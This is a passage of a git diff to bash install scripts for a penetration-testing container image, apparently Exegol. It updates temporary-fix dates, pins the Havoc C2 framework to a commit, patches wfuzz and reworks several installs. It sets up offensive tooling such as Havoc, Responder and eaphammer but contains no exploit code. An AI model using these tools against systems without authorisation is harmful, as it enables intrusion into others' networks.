criticalecho "Temp fix expired. Exiting." else @@ -126,7 +135,15 @@ function install_empire() { function install_havoc() { colorecho "Installing Havoc" - git -C /opt/tools/ clone --depth 1 https://github.com/HavocFramework/Havoc + # git -C /opt/tools/ clone --depth 1 https://github.com/HavocFramework/Havoc + # https://github.com/HavocFramework/Havoc/issues/516 + local temp_fix_limit="2024-11-01" + if [ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]; then + criticalecho "Temp fix expired. Exiting." + else + git -C /opt/tools/ clone https://github.com/HavocFramework/Havoc + git -C /opt/tools/Havoc checkout ea3646e055eb1612dcc956130fd632029dbf0b86 + fi # Building Team Server cd /opt/tools/Havoc/teamserver || exit go mod download golang.org/x/sys diff --git a/sources/install/package_cloud.sh b/sources/install/package_cloud.sh index 0722c88bf..c46f7596c 100644 --- a/sources/install/package_cloud.sh +++ b/sources/install/package_cloud.sh @@ -110,9 +110,7 @@ function install_azure_cli() { # splitting curl | bash to avoid having additional logs put in curl output being executed because of catch_and_retry curl -sL https://aka.ms/InstallAzureCLIDeb -o /tmp/azure-cli-install.sh bash /tmp/azure-cli-install.sh - fapt azure-cli - mv /opt/az/ /opt/tools/az/ - sed -i 's/\/opt/\/opt\/tools/' "$(which az)" + rm /tmp/azure-cli-install.sh add-history azure-cli add-test-command "az version" add-to-list "azure-cli,https://github.com/Azure/azure-cli,A great cloud needs great tools; we're excited to introduce Azure CLI our next generation multi-platform command line experience for Azure." diff --git a/sources/install/package_desktop.sh b/sources/install/package_desktop.sh index b33cfbde1..2efaf031d 100644 --- a/sources/install/package_desktop.sh +++ b/sources/install/package_desktop.sh @@ -16,6 +16,15 @@ function install_xfce() { # Dependencies fapt tigervnc-standalone-server tigervnc-xorg-extension tigervnc-viewer novnc websockify xfce4 dbus-x11 intltool libtool tigervnc-tools + # temp fix to use latest websockify (min 0.12.0 to fix fedora daemon issue) waiting for apt stable repo to be up-to-date + local temp_fix_limit="2024-11-01" + if [[ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]]; then + criticalecho "Temp fix expired. Exiting." + else + # Install websockify (min 0.12.0) explicit from sid repo + fapt python3-websockify/sid + fi + # Icons fapt librsvg2-common papirus-icon-theme @@ -93,6 +102,8 @@ function install_xfce() { # Stopping VNC server used for config vncserver -kill :0 sleep 6 + # Remove log files of temp vncserver run ## TODO check if more + rm /root/.vnc/*.log /root/.xsession-errors [[ -d "/root/.config/xfce4/" ]] || echo "Directory /root/.config/xfce4/ does not exist." # Binaries diff --git a/sources/install/package_forensic.sh b/sources/install/package_forensic.sh index cc248ca9a..2cf8a2b3d 100644 --- a/sources/install/package_forensic.sh +++ b/sources/install/package_forensic.sh @@ -57,10 +57,13 @@ function install_volatility2() { function install_volatility3() { colorecho "Installing volatility3" git -C /opt/tools/ clone --depth 1 https://github.com/volatilityfoundation/volatility3 - pipx install --system-site-packages /opt/tools/volatility3 + cd /opt/tools/volatility3 || exit + python3 -m venv --system-site-packages ./venv + source ./venv/bin/activate + pip3 install . # volatility's setup.py installs requirements from requirements-minimal.txt. Some reqs from requirements.txt are missing, injecting now - # pipx doesn't support injection of a requirements file : https://github.com/pypa/pipx/issues/934 - sed -e '/^#/d' -e '/^-r requirements-minimal.txt/d' /opt/tools/volatility3/requirements.txt | xargs pipx inject volatility3 + pip3 install -r requirements.txt + deactivate add-aliases volatility3 add-history volatility3 add-test-command "volatility3 --help" diff --git a/sources/install/package_mobile.sh b/sources/install/package_mobile.sh index 17c3f17a2..99534d0d4 100644 --- a/sources/install/package_mobile.sh +++ b/sources/install/package_mobile.sh @@ -88,7 +88,7 @@ function install_androguard() { colorecho "Installing androguard" pipx install --system-site-packages androguard # https://github.com/androguard/androguard/issues/1060 - local temp_fix_limit="2024-07-07" + local temp_fix_limit="2024-11-01" if [[ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]]; then criticalecho "Temp fix expired. Exiting." else @@ -108,7 +108,7 @@ function install_mobsf() { cd /opt/tools/MobSF || exit # pipx --preinstall git+https://github.com/MobSF/yara-python-dex.git /opt/tools/MobSF would be needed for ARM64 # in the mean time, switching to manual venv and an alias for mobsf - local temp_fix_limit="2024-06-20" + local temp_fix_limit="2024-11-01" if [[ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]]; then criticalecho "Temp fix expired. Exiting." # check if pipx supports preinstall now else diff --git a/sources/install/package_most_used.sh b/sources/install/package_most_used.sh index 8f488846e..b2856f53a 100644 --- a/sources/install/package_most_used.sh +++ b/sources/install/package_most_used.sh @@ -73,7 +73,6 @@ function package_most_used() { install_gittools # Dump a git repository from a website install_ysoserial # Deserialization payloads install_responder # LLMNR, NBT-NS and MDNS poisoner - install_crackmapexec # Network scanner install_impacket # Network protocols scripts install_enum4linux-ng # Active Directory enumeration tool, improved Python alternative to enum4linux install_smbmap # Allows users to enumerate samba share drives across an entire domain diff --git a/sources/install/package_network.sh b/sources/install/package_network.sh index f1c86b142..3cdc5d79c 100644 --- a/sources/install/package_network.sh +++ b/sources/install/package_network.sh @@ -177,7 +177,7 @@ function install_eaphammer() { colorecho "Installing eaphammer" git -C /opt/tools clone --depth 1 https://github.com/s0lst1c3/eaphammer.git cd /opt/tools/eaphammer || exit - xargs apt install -y < kali-dependencies.txt + fapt apache2 dnsmasq libssl-dev libnfnetlink-dev libnl-3-dev libnl-genl-3-dev libcurl4-openssl-dev zlib1g-dev libpcap-dev python3 -m venv --system-site-packages ./venv source ./venv/bin/activate pip3 install -r pip.req diff --git a/sources/install/package_osint.sh b/sources/install/package_osint.sh index 612c8a2ed..5699f0ca2 100644 --- a/sources/install/package_osint.sh +++ b/sources/install/package_osint.sh @@ -339,6 +339,8 @@ function install_finalrecon() { python3 -m venv --system-site-packages ./venv source ./venv/bin/activate pip3 install -r requirements.txt + # https://github.com/ThePorgs/Exegol-images/issues/372 + pip3 install aiodns deactivate add-aliases finalrecon add-history finalrecon @@ -497,7 +499,7 @@ function install_blackbird() { function install_sherlock() { # CODE-CHECK-WHITELIST=add-aliases colorecho "Installing Sherlock" - pipx install git+https://github.com/sherlock-project/sherlock + pipx install sherlock-project add-history sherlock add-test-command "sherlock --help" add-to-list "Sherlock,https://github.com/sherlock-project/sherlock,Hunt down social media accounts by username across social networks." diff --git a/sources/install/package_rfid.sh b/sources/install/package_rfid.sh index cb6e471b4..0c206dba2 100644 --- a/sources/install/package_rfid.sh +++ b/sources/install/package_rfid.sh @@ -84,7 +84,7 @@ function install_proxmark3() { add-aliases proxmark3 add-history proxmark3 add-test-command "proxmark3 --version" - add-to-list "proxmark3,https://github.com/Proxmark/proxmark3,Open source RFID research toolkit." + add-to-list "proxmark3,https://github.com/RfidResearchGroup/proxmark3,Open source RFID research toolkit." } # Package dedicated to RFID/NCF pentest tools diff --git a/sources/install/package_web.sh b/sources/install/package_web.sh index 0e4555821..9f156a3bf 100644 --- a/sources/install/package_web.sh +++ b/sources/install/package_web.sh @@ -54,9 +54,18 @@ function install_wfuzz() { colorecho "Installing wfuzz" apt --purge remove python3-pycurl -y fapt libcurl4-openssl-dev libssl-dev - pip3 install pycurl wfuzz + #pip3 install pycurl wfuzz # uncomment when issue is fix mkdir /usr/share/wfuzz git -C /tmp clone --depth 1 https://github.com/xmendez/wfuzz.git + # Wait for fix / PR to be merged: https://github.com/xmendez/wfuzz/issues/366 + local temp_fix_limit="2024-11-01" + if [[ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]]; then + criticalecho "Temp fix expired. Exiting." + else + pip3 install pycurl # remove this line and uncomment the first when issue is fix + sed -i 's/pyparsing>=2.4\*;/pyparsing>=2.4.2;/' /tmp/wfuzz/setup.py + pip3 install /tmp/wfuzz/ + fi mv /tmp/wfuzz/wordlist/* /usr/share/wfuzz rm -rf /tmp/wfuzz add-history wfuzz @@ -402,7 +411,7 @@ function install_oneforall() { git -C /opt/tools/ clone --depth 1 https://github.com/shmilylty/OneForAll.git cd /opt/tools/OneForAll || exit # https://github.com/shmilylty/OneForAll/pull/340 - local temp_fix_limit="2024-06-20" + local temp_fix_limit="2024-11-01" if [[ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]]; then criticalecho "Temp fix expired. Exiting." else @@ -461,7 +470,7 @@ function install_gowitness() { asdf reshim golang add-history gowitness add-test-command "gowitness --help" - add-test-command "gowitness single https://exegol.readthedocs.io" # check the chromium dependency + add-test-command "gowitness scan single --url https://exegol.readthedocs.io" # check the chromium dependency add-to-list "gowitness,https://github.com/sensepost/gowitness,A website screenshot utility written in Golang." } diff --git a/sources/install/package_wifi.sh b/sources/install/package_wifi.sh index 7466c27ce..6ff9c162a 100644 --- a/sources/install/package_wifi.sh +++ b/sources/install/package_wifi.sh @@ -32,7 +32,7 @@ function install_pyrit() { # steps to remove temp fix: # 1. try to install pyrit with git clone + venv + setup.py install with python2 or 3 (without the git patch) # 2. if it works, remove the temp fix (and probably the patch as well) - local temp_fix_limit="2024-06-20" + local temp_fix_limit="2024-11-01" if [ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]; then criticalecho "Temp fix expired. Exiting." else diff --git a/sources/install/package_wordlists.sh b/sources/install/package_wordlists.sh index 340054893..ed0737a4f 100644 --- a/sources/install/package_wordlists.sh +++ b/sources/install/package_wordlists.sh @@ -35,13 +35,6 @@ function install_cewler() { # CODE-CHECK-WHITELIST=add-aliases colorecho "Installing cewler" pipx install --system-site-packages cewler - # https://github.com/roys/cewler/pull/5 - local temp_fix_limit="2024-06-20" - if [[ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]]; then - criticalecho "Temp fix expired. Exiting." - else - pipx inject cewler pypdf==4.0.1 - fi add-history cewler add-test-command "cewler --output cewler.txt https://thehacker.recipes/" add-to-list "cewler,https://github.com/roys/cewler,CeWL alternative in Python" @@ -76,7 +69,8 @@ function install_pass_station() { function install_username-anarchy() { colorecho "Installing Username-Anarchy" - git -C /opt/tools/ clone --depth 1 https://github.com/urbanadventurer/username-anarchy + #git -C /opt/tools/ clone --depth 1 https://github.com/urbanadventurer/username-anarchy + git -C /opt/tools/ clone https://github.com/urbanadventurer/username-anarchy cd /opt/tools/username-anarchy || exit # https://github.com/urbanadventurer/username-anarchy/pull/3 local temp_fix_limit="2025-04-01"